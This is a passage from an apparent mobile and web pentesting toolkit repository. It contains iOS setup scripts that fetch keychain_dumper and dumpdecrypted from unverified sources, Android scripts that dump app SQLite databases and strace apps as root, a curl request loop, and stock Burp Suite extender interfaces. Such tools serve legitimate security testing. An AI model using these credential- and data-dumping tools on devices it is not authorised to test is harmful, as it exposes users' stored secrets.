| chmod +x /usr/bin/keychain_dumper 17 | 18 | # https://github.com/iMokhles/DumpDecrypted7 19 | 20 | git clone https://github.com/stefanesser/dumpdecrypted.git 21 | 22 | # cydia dumpdecrypted http://DJHartley.myrepospace.com/ 23 | echo deb http://DJHartley.myrepospace.com ./ > /etc/apt/sources.list.d/djhartley.list 24 | apt-get update 25 | apt-get install com.myrepospace.DJHartley.dumpdecrypted 26 | 27 | wget --no-check-certificate http://networkpx.googlecode.com/files/class-dump-z_0.2-0.tar.gz 28 | 29 | # dale a --yes o loqsea pa q no pregunte 30 | echo deb http://coredev.nl/cydia iphone main > /etc/apt/sources.list.d/coredev.nl.list 31 | echo deb http://nix.howett.net/theos ./ > /etc/apt/sources.list.d/howett.net.list 32 | apt-get update 33 | apt-get install perl net.howett.theos 34 | 35 | 36 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IMenuItemHandler.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMenuItemHandler.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerMenuItem() to register a custom 15 | * context menu item. 16 | * 17 | * @deprecated Use 18 | * IContextMenuFactory instead. 19 | */ 20 | @Deprecated 21 | public interface IMenuItemHandler 22 | { 23 | /** 24 | * This method is invoked by Burp Suite when the user clicks on a custom 25 | * menu item which the extension has registered with Burp. 26 | * 27 | * @param menuItemCaption The caption of the menu item which was clicked. 28 | * This parameter enables extensions to provide a single implementation 29 | * which handles multiple different menu items. 30 | * @param messageInfo Details of the HTTP message(s) for which the context 31 | * menu was displayed. 32 | */ 33 | void menuItemClicked( 34 | String menuItemCaption, 35 | IHttpRequestResponse[] messageInfo); 36 | } 37 | -------------------------------------------------------------------------------- /android/dump_sqlite.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # libcrack.so 3 | # Wed jul 30 17:31:16 CEST 2014 4 | # 5 | # Explore the filesystem for sqlite 6 | # databases and dump the contents 7 | 8 | if [ -z "$1" ]; then 9 | printf "\n\t\e[0;31mUsage:\e[0m $0 \n\n" 10 | exit 1 11 | fi 12 | 13 | targetdir="$1" 14 | showcontent="$2" 15 | dbfiles="dbfiles.$$" 16 | 17 | printf "[*] Discovering sqlite databases at \e[1;33m$targetdir\e[0m ...\n" 18 | find "$targetdir" -exec file {} \; | grep -i sqlite | cut -f1 -d: > "$dbfiles" 19 | 20 | while read dbfile; do 21 | printf "[*] Analysing database $dbfile \e[0;93m=========================================\e[0m\n\n" 22 | printf "[*] Database schema $dbfile \e[0;92m-----------------------------------------------------\e[0m\n\n" 23 | echo .schema | sqlite3 "$dbfile" 24 | printf "\e[1m[*] ----------------------------------------------------------------------\e[0m\n\n" 25 | 26 | if [ "$showcontent" == "true" ]; then 27 | tables=$(echo .schema | sqlite3 "$dbfile" | grep TABLE | awk '{print $3}' | cut -f1 -d \() 28 | for t in $tables; do 29 | printf "[*] Table $dbfile:$t \e[1;32m-----------------------------------------\e[0m\n\n" 30 | echo ".headers ON\n.mode columns\nselect * from $t;" | sqlite3 "$dbfile" 31 | echo;echo 32 | done 33 | fi 34 | 35 | done < "$dbfiles" 36 | rm "$dbfiles" 37 | -------------------------------------------------------------------------------- /scripts/pageload_benchmark.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # vie feb 20 12:44:53 CET 2015 3 | 4 | url= 5 | max=5000 6 | date="$(date "+%d%m%Y_%H%M%S")" 7 | logfile="${0##.*}_${date}.log" 8 | formatfile="curl.format" 9 | cookiejar="cookies.jar" 10 | csvheader="time_namelookup;time_connect;time_appconnect;time_pretransfer;time_redirect;time_starttransfer;time_total;http_code;num_redirects;speed_download;size_download;url_effective" 11 | csvformat="%{time_namelookup};%{time_connect};%{time_appconnect};%{time_pretransfer};%{time_redirect};%{time_starttransfer};%{time_total};%{http_code};%{num_redirects};%{speed_download};%{size_download};%{url_effective}\\n" 12 | ua="Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0" 13 | 14 | if [ -z "$1" ]; then 15 | echo "Usage: $0 " 16 | exit 1 17 | else 18 | url="$1" 19 | fi 20 | 21 | echo "[*]" 22 | echo "[*] ----------------------------------------" 23 | echo "[*] Starting at $(date)" 24 | echo "[*] max req: $max" 25 | echo "[*] target: $url" 26 | echo "[*] uagent: $ua" 27 | echo "[*] logfile: $logfile" 28 | echo "[*] ----------------------------------------" 29 | echo "[*]" 30 | 31 | echo "$csvheader" > "$logfile" 32 | 33 | for i in {0..5000}; do 34 | #for i in $(seq $max); do 35 | curl -Lks -A "$ua" -o /dev/null -w "$csvformat" "$url" \ 36 | | sed -e 's/,/./g;s/;/,/g' >> "$logfile" 2>&1 37 | echo -n "." 38 | done 39 | 40 | echo "[*]" 41 | echo "[*] Requests issued: $max" 42 | echo "[*] Finished at $(date)" 43 | echo "[*]" 44 | echo 45 | 46 | exit 0 47 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IProxyListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IProxyListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerHttpListener() to register a 15 | * Proxy listener. The listener will be notified of requests and responses being 16 | * processed by the Proxy tool. Extensions can perform custom analysis or 17 | * modification of these messages, and control in-UI message interception, by 18 | * registering a proxy listener. 19 | */ 20 | public interface IProxyListener 21 | { 22 | /** 23 | * This method is invoked when an HTTP message is being processed by the 24 | * Proxy. 25 | * 26 | * @param messageIsRequest Indicates whether the HTTP message is a request 27 | * or a response. 28 | * @param message An 29 | * IInterceptedProxyMessage object that extensions can use to 30 | * query and update details of the message, and control whether the message 31 | * should be intercepted and displayed to the user for manual review or 32 | * modification. 33 | */ 34 | void processProxyMessage( 35 | boolean messageIsRequest, 36 | IInterceptedProxyMessage message); 37 | } 38 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IContextMenuFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IContextMenuFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | import javax.swing.JMenuItem; 14 | 15 | /** 16 | * Extensions can implement this interface and then call 17 | * IBurpExtenderCallbacks.registerContextMenuFactory() to register 18 | * a factory for custom context menu items. 19 | */ 20 | public interface IContextMenuFactory 21 | { 22 | /** 23 | * This method will be called by Burp when the user invokes a context menu 24 | * anywhere within Burp. The factory can then provide any custom context 25 | * menu items that should be displayed in the context menu, based on the 26 | * details of the menu invocation. 27 | * 28 | * @param invocation An object that implements the 29 | * IMessageEditorTabFactory interface, which the extension can 30 | * query to obtain details of the context menu invocation. 31 | * @return A list of custom menu items (which may include sub-menus, 32 | * checkbox menu items, etc.) that should be displayed. Extensions may 33 | * return 34 | * null from this method, to indicate that no menu items are 35 | * required. 36 | */ 37 | List createMenuItems(IContextMenuInvocation invocation); 38 | } 39 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IScannerInsertionPointProvider.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerInsertionPointProvider.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * Extensions can implement this interface and then call 16 | * IBurpExtenderCallbacks.registerScannerInsertionPointProvider() 17 | * to register a factory for custom Scanner insertion points. 18 | */ 19 | public interface IScannerInsertionPointProvider 20 | { 21 | /** 22 | * When a request is actively scanned, the Scanner will invoke this method, 23 | * and the provider should provide a list of custom insertion points that 24 | * will be used in the scan. Note: these insertion points are used in 25 | * addition to those that are derived from Burp Scanner's configuration, and 26 | * those provided by any other Burp extensions. 27 | * 28 | * @param baseRequestResponse The base request that will be actively 29 | * scanned. 30 | * @return A list of 31 | * IScannerInsertionPoint objects that should be used in the 32 | * scanning, or 33 | * null if no custom insertion points are applicable for this 34 | * request. 35 | */ 36 | List getInsertionPoints( 37 | IHttpRequestResponse baseRequestResponse); 38 | } 39 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IHttpListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerHttpListener() to register an 15 | * HTTP listener. The listener will be notified of requests and responses made 16 | * by any Burp tool. Extensions can perform custom analysis or modification of 17 | * these messages by registering an HTTP listener. 18 | */ 19 | public interface IHttpListener 20 | { 21 | /** 22 | * This method is invoked when an HTTP request is about to be issued, and 23 | * when an HTTP response has been received. 24 | * 25 | * @param toolFlag A flag indicating the Burp tool that issued the request. 26 | * Burp tool flags are defined in the 27 | * IBurpExtenderCallbacks interface. 28 | * @param messageIsRequest Flags whether the method is being invoked for a 29 | * request or response. 30 | * @param messageInfo Details of the request / response to be processed. 31 | * Extensions can call the setter methods on this object to update the 32 | * current message and so modify Burp's behavior. 33 | */ 34 | void processHttpMessage(int toolFlag, 35 | boolean messageIsRequest, 36 | IHttpRequestResponse messageInfo); 37 | } 38 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IIntruderPayloadGeneratorFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadGeneratorFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory() 15 | * to register a factory for custom Intruder payloads. 16 | */ 17 | public interface IIntruderPayloadGeneratorFactory 18 | { 19 | /** 20 | * This method is used by Burp to obtain the name of the payload generator. 21 | * This will be displayed as an option within the Intruder UI when the user 22 | * selects to use extension-generated payloads. 23 | * 24 | * @return The name of the payload generator. 25 | */ 26 | String getGeneratorName(); 27 | 28 | /** 29 | * This method is used by Burp when the user starts an Intruder attack that 30 | * uses this payload generator. 31 | * 32 | * @param attack An 33 | * IIntruderAttack object that can be queried to obtain details 34 | * about the attack in which the payload generator will be used. 35 | * @return A new instance of 36 | * IIntruderPayloadGenerator that will be used to generate 37 | * payloads for the attack. 38 | */ 39 | IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack); 40 | } 41 | -------------------------------------------------------------------------------- /android/mystrace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # devnull@libcrack.so 3 | # 4 | # Android strace wrapper 5 | # 6 | 7 | test -z "$1" && { 8 | echo -e "\n\tUsage: $0 \n" 9 | exit 1 10 | } 11 | 12 | trap captura INT 13 | captura(){ 14 | echo " " 15 | echo "[*] Pulling ${strace_logfile}" 16 | adb shell pull "${strace_logfile}" . 17 | } 18 | 19 | app="$1" 20 | pid= 21 | pid_strace= 22 | 23 | num=$RANDOM 24 | logdir=. 25 | strace_logfile="/sdcard/strace_${app}.$$.${num}.log" 26 | logcat_logfile="${logdir}/logcat_${app}.$$.${num}.log" 27 | syscalls="open,access,read,write,socket,poll,select,connect,recvfrom,sendto" 28 | ignore="SFPerfTracer|TraceEventNetworkController|dalvikvm|WifiStateMachine\ 29 | |WifiP2pService|wpa_supplicant|qdhwcomposer|CydiaSubstrate|AlarmManager|MDMCTBK\ 30 | |ConnectivityService|Nat464Xlat|ModemStatsDSDetect|audio_hw_primary|audio_hw_extn\ 31 | |msm8974_platfor" 32 | 33 | test -d ${logdir} || mkdir -p ${logdir} 34 | 35 | pid_strace=$(adb shell ps | grep strace | awk '{print $2}') 36 | test -z "$pid_strace" || { 37 | echo "[*] Killing previous strace process pid=$pid_strace" 38 | adb shell su -c kill -9 "$pid_strace" 39 | } 40 | 41 | pid=$(adb shell ps | grep $app | awk '{print $2}') 42 | test -z "$pid" && { 43 | echo "ERROR: cannot get pid of $app" 44 | exit 2 45 | } 46 | 47 | echo "[*] Tracing app=${app} pid=${pid}" 48 | echo "[*] logcat log=${logcat_logfile}" 49 | echo "[*] strace log=${strace_logfile}" 50 | 51 | adb shell su -c "strace -e $syscalls -p $pid -o $strace_logfile" & 52 | sleep 3 53 | 54 | echo "[*] Now execute:" 55 | echo 'adb logcat >> ${logcat_logfile} 2>&1 &' 56 | echo 'tail -f '${logcat_logfile}' | egrep -v "'${ignore}'" | logcat-colorize' 57 | echo 58 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IMessageEditorTabFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorTabFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerMessageEditorTabFactory() to 15 | * register a factory for custom message editor tabs. This allows extensions to 16 | * provide custom rendering or editing of HTTP messages, within Burp's own HTTP 17 | * editor. 18 | */ 19 | public interface IMessageEditorTabFactory 20 | { 21 | /** 22 | * Burp will call this method once for each HTTP message editor, and the 23 | * factory should provide a new instance of an 24 | * IMessageEditorTab object. 25 | * 26 | * @param controller An 27 | * IMessageEditorController object, which the new tab can query 28 | * to retrieve details about the currently displayed message. This may be 29 | * null for extension-invoked message editors where the 30 | * extension has not provided an editor controller. 31 | * @param editable Indicates whether the hosting editor is editable or 32 | * read-only. 33 | * @return A new 34 | * IMessageEditorTab object for use within the message editor. 35 | */ 36 | IMessageEditorTab createNewInstance(IMessageEditorController controller, 37 | boolean editable); 38 | } 39 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/ICookie.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ICookie.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.Date; 13 | 14 | /** 15 | * This interface is used to hold details about an HTTP cookie. 16 | */ 17 | public interface ICookie 18 | { 19 | /** 20 | * This method is used to retrieve the domain for which the cookie is in 21 | * scope. 22 | * 23 | * @return The domain for which the cookie is in scope. Note: For 24 | * cookies that have been analyzed from responses (by calling 25 | * IExtensionHelpers.analyzeResponse() and then 26 | * IResponseInfo.getCookies(), the domain will be 27 | * null if the response did not explicitly set a domain 28 | * attribute for the cookie. 29 | */ 30 | String getDomain(); 31 | 32 | /** 33 | * This method is used to retrieve the expiration time for the cookie. 34 | * 35 | * @return The expiration time for the cookie, or 36 | * null if none is set (i.e., for non-persistent session 37 | * cookies). 38 | */ 39 | Date getExpiration(); 40 | 41 | /** 42 | * This method is used to retrieve the name of the cookie. 43 | * 44 | * @return The name of the cookie. 45 | */ 46 | String getName(); 47 | 48 | /** 49 | * This method is used to retrieve the value of the cookie. 50 | * @return The value of the cookie. 51 | */ 52 | String getValue(); 53 | } 54 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IResponseInfo.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IResponseInfo.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used to retrieve key details about an HTTP response. 16 | * Extensions can obtain an 17 | * IResponseInfo object for a given response by calling 18 | * IExtensionHelpers.analyzeResponse(). 19 | */ 20 | public interface IResponseInfo 21 | { 22 | /** 23 | * This method is used to obtain the HTTP headers contained in the response. 24 | * 25 | * @return The HTTP headers contained in the response. 26 | */ 27 | List getHeaders(); 28 | 29 | /** 30 | * This method is used to obtain the offset within the response where the 31 | * message body begins. 32 | * 33 | * @return The offset within the response where the message body begins. 34 | */ 35 | int getBodyOffset(); 36 | 37 | /** 38 | * This method is used to obtain the HTTP status code contained in the 39 | * response. 40 | * 41 | * @return The HTTP status code contained in the response. 42 | */ 43 | short getStatusCode(); 44 | 45 | /** 46 | * This method is used to obtain details of the HTTP cookies set in the 47 | * response. 48 | * 49 | * @return A list of 50 | * ICookie objects representing the cookies set in the 51 | * response, if any. 52 | */ 53 | List getCookies(); 54 | } 55 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IHttpRequestResponseWithMarkers.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponseWithMarkers.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used for an 16 | * IHttpRequestResponse object that has had markers applied. 17 | * Extensions can create instances of this interface using 18 | * IBurpExtenderCallbacks.applyMarkers(), or provide their own 19 | * implementation. Markers are used in various situations, such as specifying 20 | * Intruder payload positions, Scanner insertion points, and highlights in 21 | * Scanner issues. 22 | */ 23 | public interface IHttpRequestResponseWithMarkers extends IHttpRequestResponse 24 | { 25 | /** 26 | * This method returns the details of the request markers. 27 | * 28 | * @return A list of index pairs representing the offsets of markers for the 29 | * request message. Each item in the list is an int[2] array containing the 30 | * start and end offsets for the marker. The method may return 31 | * null if no request markers are defined. 32 | */ 33 | List getRequestMarkers(); 34 | 35 | /** 36 | * This method returns the details of the response markers. 37 | * 38 | * @return A list of index pairs representing the offsets of markers for the 39 | * response message. Each item in the list is an int[2] array containing the 40 | * start and end offsets for the marker. The method may return 41 | * null if no response markers are defined. 42 | */ 43 | List getResponseMarkers(); 44 | } 45 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IIntruderPayloadProcessor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadProcessor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerIntruderPayloadProcessor() to 15 | * register a custom Intruder payload processor. 16 | */ 17 | public interface IIntruderPayloadProcessor 18 | { 19 | /** 20 | * This method is used by Burp to obtain the name of the payload processor. 21 | * This will be displayed as an option within the Intruder UI when the user 22 | * selects to use an extension-provided payload processor. 23 | * 24 | * @return The name of the payload processor. 25 | */ 26 | String getProcessorName(); 27 | 28 | /** 29 | * This method is invoked by Burp each time the processor should be applied 30 | * to an Intruder payload. 31 | * 32 | * @param currentPayload The value of the payload to be processed. 33 | * @param originalPayload The value of the original payload prior to 34 | * processing by any already-applied processing rules. 35 | * @param baseValue The base value of the payload position, which will be 36 | * replaced with the current payload. 37 | * @return The value of the processed payload. This may be 38 | * null to indicate that the current payload should be skipped, 39 | * and the attack will move directly to the next payload. 40 | */ 41 | byte[] processPayload( 42 | byte[] currentPayload, 43 | byte[] originalPayload, 44 | byte[] baseValue); 45 | } 46 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IIntruderPayloadGenerator.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadGenerator.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used for custom Intruder payload generators. Extensions 14 | * that have registered an 15 | * IIntruderPayloadGeneratorFactory must return a new instance of 16 | * this interface when required as part of a new Intruder attack. 17 | */ 18 | public interface IIntruderPayloadGenerator 19 | { 20 | /** 21 | * This method is used by Burp to determine whether the payload generator is 22 | * able to provide any further payloads. 23 | * 24 | * @return Extensions should return 25 | * false when all the available payloads have been used up, 26 | * otherwise 27 | * true. 28 | */ 29 | boolean hasMorePayloads(); 30 | 31 | /** 32 | * This method is used by Burp to obtain the value of the next payload. 33 | * 34 | * @param baseValue The base value of the current payload position. This 35 | * value may be 36 | * null if the concept of a base value is not applicable (e.g. 37 | * in a battering ram attack). 38 | * @return The next payload to use in the attack. 39 | */ 40 | byte[] getNextPayload(byte[] baseValue); 41 | 42 | /** 43 | * This method is used by Burp to reset the state of the payload generator 44 | * so that the next call to 45 | * getNextPayload() returns the first payload again. This 46 | * method will be invoked when an attack uses the same payload generator for 47 | * more than one payload position, for example in a sniper attack. 48 | */ 49 | void reset(); 50 | } 51 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IMessageEditorController.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorController.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used by an 14 | * IMessageEditor to obtain details about the currently displayed 15 | * message. Extensions that create instances of Burp's HTTP message editor can 16 | * optionally provide an implementation of 17 | * IMessageEditorController, which the editor will invoke when it 18 | * requires further information about the current message (for example, to send 19 | * it to another Burp tool). Extensions that provide custom editor tabs via an 20 | * IMessageEditorTabFactory will receive a reference to an 21 | * IMessageEditorController object for each tab instance they 22 | * generate, which the tab can invoke if it requires further information about 23 | * the current message. 24 | */ 25 | public interface IMessageEditorController 26 | { 27 | /** 28 | * This method is used to retrieve the HTTP service for the current message. 29 | * 30 | * @return The HTTP service for the current message. 31 | */ 32 | IHttpService getHttpService(); 33 | 34 | /** 35 | * This method is used to retrieve the HTTP request associated with the 36 | * current message (which may itself be a response). 37 | * 38 | * @return The HTTP request associated with the current message. 39 | */ 40 | byte[] getRequest(); 41 | 42 | /** 43 | * This method is used to retrieve the HTTP response associated with the 44 | * current message (which may itself be a request). 45 | * 46 | * @return The HTTP response associated with the current message. 47 | */ 48 | byte[] getResponse(); 49 | } 50 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/IMessageEditor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide extensions with an instance of Burp's HTTP 16 | * message editor, for the extension to use in its own UI. Extensions should 17 | * call 18 | * IBurpExtenderCallbacks.createMessageEditor() to obtain an 19 | * instance of this interface. 20 | */ 21 | public interface IMessageEditor 22 | { 23 | /** 24 | * This method returns the UI component of the editor, for extensions to add 25 | * to their own UI. 26 | * 27 | * @return The UI component of the editor. 28 | */ 29 | Component getComponent(); 30 | 31 | /** 32 | * This method is used to display an HTTP message in the editor. 33 | * 34 | * @param message The HTTP message to be displayed. 35 | * @param isRequest Flags whether the message is an HTTP request or 36 | * response. 37 | */ 38 | void setMessage(byte[] message, boolean isRequest); 39 | 40 | /** 41 | * This method is used to retrieve the currently displayed message, which 42 | * may have been modified by the user. 43 | * 44 | * @return The currently displayed HTTP message. 45 | */ 46 | byte[] getMessage(); 47 | 48 | /** 49 | * This method is used to determine whether the current message has been 50 | * modified by the user. 51 | * 52 | * @return An indication of whether the current message has been modified by 53 | * the user since it was first displayed. 54 | */ 55 | boolean isMessageModified(); 56 | 57 | /** 58 | * This method returns the data that is currently selected by the user. 59 | * 60 | * @return The data that is currently selected by the user, or 61 | * null if no selection is made. 62 | */ 63 | byte[] getSelectedData(); 64 | } 65 | -------------------------------------------------------------------------------- /burpsuite/extensions/base64/burp/ISessionHandlingAction.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ISessionHandlingAction.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Free Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerSessionHandlingAction() to 15 | * register a custom session handling action. Each registered action will be 16 | * available within the session handling rule UI for the user to select as a 17 | * rule action. Users can choose to invoke an action directly in its own right, 18 | * or following execution of a macro. 19 | */ 20 | public interface ISessionHandlingAction 21 | { 22 | /** 23 | * This method is used by Burp to obtain the name of the session handling 24 | * action. This will be displayed as an option within the session handling 25 | * rule editor when the user selects to execute an extension-provided 26 | * action. 27 | * 28 | * @return The name of the action. 29 | */ 30 | String getActionName(); 31 | 32 | /** 33 | * This method is invoked when the session handling action should be 34 | * executed. This may happen as an action in its own right, or as a 35 | * sub-action following execution of a macro. 36 | * 37 | * @param currentRequest The base request that is currently being processed. 38 | * The action can query this object to obtain details about the base 39 | * request. It can issue additional requests of its own if necessary, and 40 | * can use the setter methods on this object to update the base request. 41 | * @param macroItems If the action is invoked following execution of a 42 | * macro, this parameter contains the result of executing the macro. 43 | * Otherwise, it is 44 | * null. Actions can use the details of the macro items to 45 | * perform custom analysis of the macro to derive values of non-standard 46 | * session handling tokens, etc. 47 | */ 48 | void performAction( 49 | IHttpRequestResponse currentRequest, 50 | IHttpRequestResponse[] macroItems); 51 | } 52 | -------------------------------------------------------------------------------- /ios/install_pentest_iOS_env.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # devnull@libcrack.so 3 | # lun jun 30 18:03:10 CEST 2014 4 | # Install pentesting tools on an ios device 5 | 6 | # dpkg -l | grep -q openssh \ 7 | # || { echo "[!] INSTALL OpenSSH"; exit 1; } 8 | # dpkg -l | grep -q bigbosshackertools \ 9 | # || { echo "[!] INSTALL Big Boss Recommended Tools"; exit 1; } 10 | 11 | apps_needed="openssh bigbosshackertools" 12 | 13 | for app in $apps_needed; do 14 | dpkg -l | grep -q $app || { 15 | echo "[!] INSTALL $app before start" 16 | exit 1 17 | } 18 | done 19 | 20 | # --- repositories ---------------------------------------------------------- 21 | 22 | repodir="/etc/apt/sources.list.d" 23 | 24 | echo "[*] Adding repos $repo" 25 | 26 | # snoopit 27 | echo "deb http://repo.nesolabs.de/ ./" > $repodir/neso.list 28 | # dumpdecrypted 29 | echo "deb http://DJHartley.myrepospace.com ./" > $repodir/djhartley.list 30 | # perl 31 | echo "deb http://coredev.nl/cydia iphone main" > $repodir/coredev.nl.list 32 | # theos 33 | echo "deb http://nix.howett.net/theos ./" > $repodir/howett.net.list 34 | 35 | # --- install apps ---------------------------------------------------------- 36 | 37 | apt-get update 38 | 39 | # development 40 | apt-get install org.coolstar.iostoolchain 41 | apt-get install org.coolstar.cctools 42 | apt-get install com.bigboss.20toolchain 43 | #apt-get install net.howett.theos 44 | apt-get install --yes net.howett.theos 45 | 46 | # programming languages 47 | apt-get install python 48 | apt-get install file 49 | apt-get install perl 50 | 51 | # system utils 52 | apt-get install com.slugrail.ipainstaller 53 | apt-get install com.myrepospace.DJHartley.dumpdecrypted 54 | apt-get install mobileterminal 55 | 56 | # command line utils 57 | apt-get install bash 58 | apt-get install adv-cmds 59 | apt-get install com.ericasadun.utilities 60 | 61 | # networking 62 | apt-get install tcpdump 63 | 64 | # keychain_dumper 65 | wget --no-check-certificate \ 66 | https://github.com/ptoomey3/Keychain-Dumper/raw/master/keychain_dumper \ 67 | -O /usr/bin/keychain_dumper \ 68 | && chmod +x /usr/bin/keychain_dumper 69 | 70 | # dumpdecrypted 71 | # https://github.com/iMokhles/DumpDecrypted7 72 | # git clone https://github.com/stefanesser/dumpdecrypted.git 73 | 74 | # class-dump-z 75 | wget --no-check-certificate \ 76 | http://networkpx.googlecode.com/files/class-dump-z_0.2-0.tar.gz 77 | 78 | -------------------------------------------------------------------------------- /burpsuite/mkBurpExtension.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | dirname="$1" 4 | jarfile="$1.jar" 5 | apifile="burp_extender_api.zip" 6 | apifileurl="http://portswigger.net/burp/extender/api/burp_extender_api.zip" 7 | makefile="Makefile" 8 | antfile="build.xml" 9 | 10 | [[ -z "$1" || -z "$2" ]] && { 11 | echo -e "\n\tUsage: $0 <[makefile|ant]>\n" 12 | exit 1 13 | } 14 | 15 | [[ -d "$1" ]] && { 16 | echo -e "\n\t[!] ERROR: The directory $dirname already 